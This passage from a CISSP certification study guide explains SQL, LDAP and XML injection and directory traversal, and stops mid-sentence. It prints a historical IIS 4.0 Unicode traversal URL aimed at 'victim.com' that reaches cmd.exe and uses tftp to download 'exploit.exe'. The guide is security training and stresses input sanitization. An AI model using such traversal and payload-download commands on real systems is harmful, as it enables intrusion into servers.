Page 616 - (ISC)² CISSP Certified Information Systems Security Professional Official Study Guide
P. 616
the programming language or execution environment.
Ultimately, SQL injection is a vulnerability of the script used to handle
the interaction between a front end (typically a web server) and the
backend database. If the script was written defensively and included
code to escape (invalidate or reject) metacharacters, SQL injection
would not be possible.
LDAP injection is a variation of an input injection attack; however, the
focus of the attack is on the back end of an LDAP directory service
rather than a database server. If a web server front end uses a script to
craft LDAP statements based on input from a user, then LDAP
injection is potentially a threat. Just as with SQL injection, sanitization
of input and defensive coding are essential to eliminate this threat.
XML injection is another variant of SQL injection, where the backend
target is an XML application. Again, input sanitization is necessary to
eliminate this threat.
Directory Traversal/Command Injection
A directory traversal is an attack that enables an attacker to jump
out of the web root directory structure and into any other part of
the filesystem hosted by the web server’s host OS. A common, but
historical, version of this attack was against IIS 4.0, hosted by
Windows NT 4.0 Server. The attack used a modified URL to
directory-traverse out of the web root, into the main OS folders, in
order to access the command prompt executable. Here’s an
example:
http://victim.com/scripts/..% c0 % af../..% c0 % af../..% c0
% af../..% c0 % af../..% c
0 % af../..% c0 % af../winnt/system32/cmd.exe?/c+tftp+-
i+get+exploit.exe
This URL includes a Unicode equivalent of the “change to parent
directory” command, which is ../ in ASCII, and also notice it uses
the metacharacter of percent (%). This URL not only performed
directory traversal but also granted the attacker the ability to
